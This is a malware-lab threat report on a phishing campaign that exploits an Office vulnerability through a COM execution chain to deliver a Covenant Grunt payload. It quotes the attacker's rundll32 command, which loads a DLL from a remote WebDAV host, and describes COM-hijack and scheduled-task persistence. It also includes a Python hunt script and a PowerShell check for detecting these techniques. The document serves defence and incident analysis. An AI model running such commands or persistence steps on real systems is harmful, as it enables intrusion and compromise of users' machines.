Irondefence Malware Analysis Lab

Report dossier

CVE-2026-21509 | Campaign analysis and COM abuse chain

English edition of the report covering CVE-2026-21509 exploitation and Covenant Grunt delivery.

Published 15/03/2026
Report ID cve-2026-21509-crafty-leshy
Language English
Available English / Polish
TLP CLEAR
Sections 7
Tags office, phishing, covenant, COM abuse

CVE-2026-21509

This report documents a phishing campaign abusing CVE-2026-21509 in Microsoft Office to trigger a COM-based execution chain and deliver a Covenant Grunt payload. Analysis indicates that the adversary weaponized the vulnerability shortly after public disclosure and used highly targeted phishing lures aligned with both sender and recipient context.

Vulnerability overview

CVE-2026-21509 stems from improper validation of untrusted input used by Microsoft Office during security decisions. In the observed scenario, a crafted document bypassed the Compatibility Flags protection logic and initialized a COM object that started the downstream infection chain.

From the victim perspective, opening the malicious document was sufficient to trigger execution.

Observed infection chain

The document embedded the OLE object Shell.Explorer.1 with CLSID EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B. That object initiated retrieval and execution of a remote .lnk file hosted over WebDAV.

The shortcut ultimately led Windows to execute:

rundll32.exe shell32.dll,Control_RunDLL "\\freefoodaid.com@SSL\tables\tables.d"

This loaded a malicious DLL and advanced the attack into persistence and payload staging. Subsequent stages included COM Hijacking, task creation and process restart logic designed to reactivate the malicious component inside explorer.exe.

Persistence and staging

The attack chain modified COM-related registry keys to establish persistence and then created a scheduled task that terminated and restarted explorer.exe. This ensured the hijacked COM component would be reloaded in a trusted process context.

Later, EhStoreShell.dll extracted shellcode from SplashScreen.png using LSB steganography and executed it in memory. The payload was identified as a Covenant Grunt stager communicating through filen[.]io.

Analyst notes

The campaign stands out because of its targeting quality and the operational discipline visible in lure construction. The use of compromised mailboxes, matching message themes and follow-on persistence mechanisms strongly suggests a mature operator.

Recommendations

  • Apply Microsoft Office security updates immediately.
  • Hunt for WebDAV activity and suspicious rundll32.exe launches tied to remote .cpl or DLL resources.
  • Review scheduled tasks and COM persistence artifacts under user-controlled registry paths.
  • Use YARA and IOC-based searches to identify related mail and endpoint artifacts.
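The second and third recommendations can be turned into a small hunt over process-creation telemetry. The Python below is an added example, not code from the report or its authors: it scans constructed Sysmon-style events (parent image, image, command line; the hostnames and paths are placeholders) and flags rundll32.exe launches that load a module from a WebDAV or other UNC path, use Control_RunDLL on such a remote module, or are spawned directly by an Office application.

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (not from the report).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'rundll32.exe shell32.dll,Control_RunDLL "\\webdav.example.invalid@SSL\tables\tables.d"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\intl.cpl"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmd": r"notepad.exe C:\Users\user\notes.txt"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe \\fileserver.example.invalid@8080\DavWWWRoot\share\x.dll,Entry"},
]

# UNC host with the WebDAV markers "@SSL" / "@<port>", or a DavWWWRoot component.
WEBDAV_UNC = re.compile(r"\\\\[^\\\s\"']+@(?:SSL|\d+)\\|\\\\[^\\\s\"']+\\DavWWWRoot\\", re.I)
# Any UNC path (\\host\share\...) appearing in the command line.
ANY_UNC = re.compile(r"\\\\[^\\\s\"']+\\")
OFFICE_PARENT = re.compile(r"\\(?:WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$", re.I)

def score_event(ev):
    """Return the list of hunt rules this event matches; empty means not of interest."""
    reasons = []
    if not ev["image"].lower().endswith("\\rundll32.exe"):
        return reasons
    cmd = ev["cmd"]
    remote = ANY_UNC.search(cmd) is not None
    if WEBDAV_UNC.search(cmd):
        reasons.append("module path is a WebDAV UNC (@SSL/@port or DavWWWRoot)")
    elif remote:
        reasons.append("module path is a remote UNC share")
    if remote and "control_rundll" in cmd.lower():
        reasons.append("Control_RunDLL invoked on a remote .cpl/DLL")
    if OFFICE_PARENT.search(ev["parent"]):
        reasons.append("parent process is an Office application")
    return reasons

def hunt(events):
    """Return (event index, reasons) for every event that matched at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for i, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['cmd']}\n  " + "\n  ".join(reasons))
```

The local Control Panel launch (event 1) produces no hit, which is the intended false-positive control; feed the functions your own exported events with the same three fields.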

Detection snippet

# List scheduled tasks whose name matches the pattern; -match is a regex,
# so variants such as "OneDriveHealthCheck" are also returned.
Get-ScheduledTask | Where-Object {
  $_.TaskName -match "OneDriveHealth"
} | Select-Object TaskName, TaskPath, State

Conclusion

This case illustrates how quickly a capable adversary can operationalize a newly disclosed Office vulnerability. Even with relatively limited user interaction, the chain enabled code execution, persistence and memory-resident staging.